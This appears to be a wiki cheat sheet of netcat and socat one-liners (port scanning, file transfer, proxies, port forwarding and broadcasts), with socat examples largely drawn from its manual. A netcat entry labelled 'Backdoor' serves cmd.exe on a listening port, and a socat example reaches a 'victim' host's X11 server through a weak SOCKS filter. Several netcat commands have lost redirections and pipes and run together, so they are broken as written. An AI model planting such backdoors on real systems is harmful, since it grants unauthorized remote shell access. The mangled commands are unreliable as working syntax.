NetCat


 * Netcat is referred to as a "Swiss-army knife for TCP/IP"

nc -v -w 2 -z 10.66.10.23 20-30 netcat -z -n -v 111.111.111.111 1-1000 2>&1 | grep succeeded while true; do nc -z -n -v 111.111.111.111 2>&1 | grep succeeded; sleep 1; done
 * Port Scanner

netcat -l 8888 < index.html View the contents http://server_IP:8888 Looping to prevent netcat from exiting while true; do nc -l 8888 < index.html; done while true; do sudo nc -lp 80 < index.html; done
 * Host a website

nc -L -p 10001 -d -e cmd.exe
 * Backdoor

Here: -L not close and wait for connections -p port to listen -d 	Tells Netcat to detach from the process we want it to run. -e 	Tells what program to run once the port is connected to (cmd.exe)

nc -v -n 10.66.10.23 80
 * Access backdoor

nc 10.66.10.23 1234 hack.txt
 * Send & Received a file

Source: cat file.txt | nc -l 4009 Destination: nc 10.10.10.10 4009 > file.txt
 * File transfer

netcat -l 4444 Execute on remote PC netcat domain.com 4444
 * Chat Server

mkfifo proxypipe while true; do nc -l 5000 0 proxypipe; done You can access Google by http://127.0.0.1:5000.
 * Create a web proxy

mkfifo proxypipe mkfifo proxypipe2 nc -l 5000 -k > proxypipe < proxypipe2 & while true; do openssl s_client -connect www.google.com:443 -quiet proxypipe2; done
 * Create an SSL proxy

On server: cat video.avi | nc -l 5000 On Client: nc 192.168.233.208 5000 | mplayer -vo x11 -cache 3000 -
 * Stream a video file

=Socat=

It is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
 * Socat: Multipurpose relay

socat - TCP4:www.domain.org:80
 * Transfers data between STDIO (-) and a TCP4 connection to port 80 of host www.domain.org. This example results in an interactive connection similar to telnet or netcat. The stdin terminal parameters are not changed, so you may close the relay with ^D or abort it with ^C.

socat -d -d READLINE,history=$HOME/.http_history \ TCP4:www.domain.org:www,crnl
 * This is similar to the previous example, but you can edit the current line in a bash like manner (READLINE) and use the history file .http_history; socat prints messages about progress (-d -d). The port is specified by service name (www), and correct network line termination characters (crnl) instead of NL are used.

socat TCP4-LISTEN:www TCP4:www.domain.org:www
 * Installs a simple TCP port forwarder. With TCP4-LISTEN it listens on local port "www" until a connection comes in, accepts it, then connects to the remote host (TCP4) and starts data transfer. It will not accept a econd connection.

socat -d -d -lmlocal2 \ TCP4-LISTEN:80,bind=myaddr1,su=nobody,fork,range=10.0.0.0/8,reuseaddr \ TCP4:www.domain.org:80,bind=myaddr2
 * TCP port forwarder, each side bound to another local IP address (bind). This example handles an almost arbitrary number of parallel or consecutive connections by fork'ing a new process after each accept . It provides a little security by su'ing to user nobody after forking; it only permits connections from the private 10 network (range); due to reuseaddr, it allows immediate restart after master process's termination, even if some child sockets are not completely shut down. With -lmlocal2, socat logs to stderr until successfully reaching the accept loop. Further logging is directed to syslog with facility local2.

socat TCP4-LISTEN:5555,fork,tcpwrap=script \ EXEC:/bin/myscript,chroot=/home/sandbox,su-d=sandbox,pty,stderr
 * A simple server that accepts connections (TCP4-LISTEN) and fork's a new child process for each connection; every child acts as single relay. The client must match the rules for daemon process name "script" in /etc/hosts.allow and /etc/hosts.deny, otherwise it is refused access (see "man 5 hosts_access"). For EXEC'uting the program, the child process chroot's to /home/sandbox, su's to user sandbox, and then starts the program /home/sandbox/bin/myscript. Socat and myscript communicate via a pseudo tty (pty); myscript's stderr is redirected to stdout, so its error messages are transferred via socat to the connected client.


 * mail.sh is a shell script, distributed with socat, that implements a simple SMTP client. It is programmed to "speak" SMTP on its FDs 3 (in) and 4 (out). The fdin and fdout options tell socat to use these FDs for communication with the program. Because mail.sh inherits stdin and stdout while socat does not use them, the script can read a mail body from stdin. Socat makes alias1 your local source address (bind), cares for correct network line termination (crnl) and sends at most 512 data bytes per packet (mss).

socat EXEC:"mail.sh target@domain.com",fdin=3,fdout=4 \ TCP4:mail.relay.org:25,crnl,bind=alias1.server.org,mss=512

socat -,raw,echo=0,escape=0x0f /dev/ttyS0,raw,echo=0,crnl
 * Opens an interactive connection via the serial line, e.g. for talking with a modem. raw and echo set the console's and ttyS0's terminal parameters to practicable values, crnl converts to correct newline characters. escape allows to terminate the socat process with character control-O. Consider using READLINE instead of the first address.

socat UNIX-LISTEN:/tmp/.X11-unix/X1,fork \ SOCKS4:host.victim.org:127.0.0.1:6000,socksuser=nobody,sourceport=20
 * With UNIX-LISTEN, socat opens a listening UNIX domain socket /tmp/.X11-unix/X1. This path corresponds to local XWindow display :1 on your machine, so XWindow client connections to DISPLAY=:1 are accepted. Socat then speaks with the SOCKS4 server host.victim.org that might permit sourceport 20 based connections due to an FTP related weakness in its static IP filters. Socat pretends to be invoked by socksuser nobody, and requests to be connected to loopback port 6000 (only weak sockd configurations will allow this). So we get a connection to the victims XWindow server and, if it does not require MIT cookies or Kerberos authentication, we can start work. Please note that there can only be one connection at a time, because TCP can establish only one session with a given set of addresses and ports.

socat -u /tmp/readdata,seek-end=0,ignoreeof -
 * This is an example for unidirectional data transfer (-u). Socat transfers data from file /tmp/readdata (implicit address GOPEN), starting at its current end (seek-end=0 lets socat start reading at current end of file; use seek=0 or no seek option to first read the existing data) in a "tail -f" like mode (ignoreeof). The "file" might also be a listening UNIX domain socket (do not use a seek option then).

(sleep 5; echo PASSWORD; sleep 5; echo ls; sleep 1) | socat - EXEC:'ssh -l user server',pty,setsid,ctty
 * EXEC'utes an ssh session to server. Uses a pty for communication between socat and ssh, makes it ssh's controlling tty (ctty), and makes this pty the owner of a new process group (setsid), so ssh accepts the password from socat.

socat -u TCP4-LISTEN:3334,reuseaddr,fork \ OPEN:/tmp/in.log,creat,append
 * Implements a simple network based message collector. For each client connecting to port 3334, a new child process is generated (option fork). All data sent by the clients are append'ed to the file /tmp/in.log. If the file does not exist, socat creat's it. Option reuseaddr allows immediate restart of the server process.

socat READLINE,noecho='[Pp]assword:' EXEC:'ftp ftp.server.com',pty,setsid,ctty
 * Wraps a command line history (READLINE) around the EXEC'uted ftp client utility. This allows editing and reuse of FTP commands for relatively comfortable browsing through the ftp directory hierarchy. The password is echoed! pty is required to have ftp issue a prompt. Nevertheless, there may occur some confusion with the password and FTP prompts.

(socat PTY,link=$HOME/dev/vmodem0,raw,echo=0,wait-slave EXEC:'"ssh modemserver.us.org socat - /dev/ttyS0,nonblock,raw,echo=0"')
 * Generates a pseudo terminal device (PTY) on the client that can be reached under the symbolic link $HOME/dev/vmodem0. An application that expects a serial line or modem can be configured to use $HOME/dev/vmodem0; its traffic will be directed to a modemserver via ssh where another socat instance links it with /dev/ttyS0.

socat TCP4-LISTEN:2022,reuseaddr,fork \ PROXY:proxy:www.domain.org:22,proxyport=3128,proxyauth=user:pass
 * Starts a forwarder that accepts connections on port 2022, and directs them through the proxy daemon listening on port 3128 (proxyport) on host proxy, using the CONNECT method, where they are authenticated as "user" with "pass" (proxyauth). The proxy should establish connections to host www.domain.org on port 22 then.

socat - SSL:server:4443,cafile=server.crt,cert=client.pem
 * This is an OpenSSL client that tries to establish a secure connection to an SSL server. Option cafile specifies a file that contains trust certificates: we trust the server only when it presents one of these certificates and proofs that it owns the related private key. Otherwise the connection is terminated. With cert a file containing the client certificate and the associated private key is specified. This is required in case the server wishes a client authentication; many Internet servers do not. The first address ('-') can be replaced by almost any other socat address.

The second address ('PIPE') can be replaced by almost any other socat address. For instructions on generating and distributing OpenSSL keys and certificates see the additional socat docu socat-openssl.txt. socat SSL-LISTEN:4443,reuseaddr,pf=ip4,fork,cert=server.pem,cafile=client.crt PIPE
 * This is an OpenSSL server that accepts TCP connections, presents the certificate from the file server.pem and forces the client to present a certificate that is verified against cafile.crt.

echo |socat -u - file:/tmp/bigfile,create,largefile,seek=100000000000
 * Creates a 100GB sparse file; this requires a file system type that supports this (ext2, ext3, reiserfs, jfs; not minix, vfat). The operation of writing 1 byte might take long (reiserfs: some minutes; ext2: "no" time), and the resulting file can consume some disk space with just its inodes (reiserfs: 2MB; ext2: 16KB).

socat tcp-l:7777,reuseaddr,fork system:'filan -i 0 -s >&2',nofork
 * Listens for incoming TCP connections on port 7777. For each accepted connection, invokes a shell. This shell has its stdin and stdout directly connected to the TCP socket (nofork). The shell starts filan and lets it print the socket addresses to stderr (your terminal window).

echo -e "\0\14\0\0\c" |socat -u - file:/usr/bin/squid.exe,seek=0x00074420
 * Functions as primitive binary editor: it writes the 4 bytes 000 014 000 000 to the executable /usr/bin/squid at offset 0x00074420 (this is a real world patch to make the squid executable from Cygwin run under Windows, actual per May 2004).

socat - tcp:www.blackhat.org:31337,readbytes=1000
 * Connects to an unknown service and prevents being flooded.

socat -U TCP:target:9999,end-close TCP-L:8888,reuseaddr,fork
 * Merges data arriving from different TCP streams on port 8888 to just one stream to target:9999. The end-close option prevents the child processes forked off by the second address from terminating the shared connection to 9999 (close\(2) just unlinks the inode which stays active as long as the parent process lives; shutdown\(2) would actively terminate the connection).

socat - UDP4-DATAGRAM:192.168.1.0:123,sp=123,broadcast,range=192.168.1.0/24
 * Sends a broadcast to the network 192.168.1.0/24 and receives the replies of the timeservers there. Ignores NTP packets from hosts outside this network.

 socat - SOCKET-DATAGRAM:2:2:17:x007bxc0a80100x0000000000000000,bind=x007bx00000000x0000000000000000,setsockopt- int=1:6:1,range=x0000xc0a80100x0000000000000000:x0000xffffff00x0000000000000000
 * This is semantically equivalent to the previous example, but all parameters are specified in generic form. the value 6 of setsockopt-int is the Linux value for SO_BROADCAST.

socat - IP4-DATAGRAM:255.255.255.255:44,broadcast,range=10.0.0.0/8
 * Sends a broadcast to the local network\(s) using protocol 44. Accepts replies from the private address range only.

socat - UDP4-DATAGRAM:224.255.0.1:6666,bind=:6666,ip-add-membership=224.255.0.1:eth0
 * Transfers data from stdin to the specified multicast address using UDP. Both local and remote ports are 6666. Tells the interface eth0 to also accept multicast packets of the given group. Multiple hosts on the local network can run this command, so all data sent by any of the hosts will be received by all the other ones. Note that there are many possible reasons for failure, including IP-filters, routing issues, wrong interface selection by the operating system, bridges, or a badly configured switch.

socat TCP:host2:4443 TUN:192.168.255.1/24,up
 * Establishes one side of a virtual (but not private!) network with host2 where a similar process might run, with UDP-L and tun address 192.168.255.2. They can reach each other using the addresses 192.168.255.1 and 192.168.255.2. Note that streaming eg. via TCP or SSL does not guarantee to retain packet boundaries and may thus cause packet loss.

socat PTY,link=/var/run/ppp,raw,echo=0 INTERFACE:hdlc0
 * Circumvents the problem that pppd requires a serial device and thus might not be able to work on a synchronous line that is represented by a network device. socat creates a PTY to make pppd happy, binds to the network interface hdlc0, and can transfer data between both devices. Use pppd on device /var/run/ppp then.

 socat -T 1 -d -d TCP-L:10081,reuseaddr,fork,crlf SYSTEM:"echo -e \"\\\"HTTP/1.0 200 OK\\\nDocumentType: text/plain\\\n\\\ndate: \$\(date\)\\\nserver:\$SOCAT_SOCKADDR:\$SOCAT_SOCKPORT\\\nclient: \$SOCAT_PEERADDR:\$SOCAT_PEERPORT\\\n\\\"\"; cat; echo -e \"\\\"\\\n\\\"\""
 * Creates a simple HTTP echo server: each HTTP client that connects gets a valid HTTP reply that contains information about the client address and port as it is seen by the server host, the host address (which might vary on multihomed servers), and the original client request.

 socat -d -d UDP4-RECVFROM:9999,so-broadcast,so-timestamp,ip-pktinfo,ip-recverr,ip-recvopts,ip-recvtos,ip-recvttl!!- SYSTEM:'export; sleep 1' |grep SOCAT
 * Waits for an incoming UDP packet on port 9999 and prints the environment variables provided by socat. On BSD based systems you have to replace ip-pktinfo with ip-recvdstaddr,ip-recvif. Especially interesting is SOCAT_IP_DSTADDR: it contains the target address of the packet which may be a unicast, multicast, or broadcast address.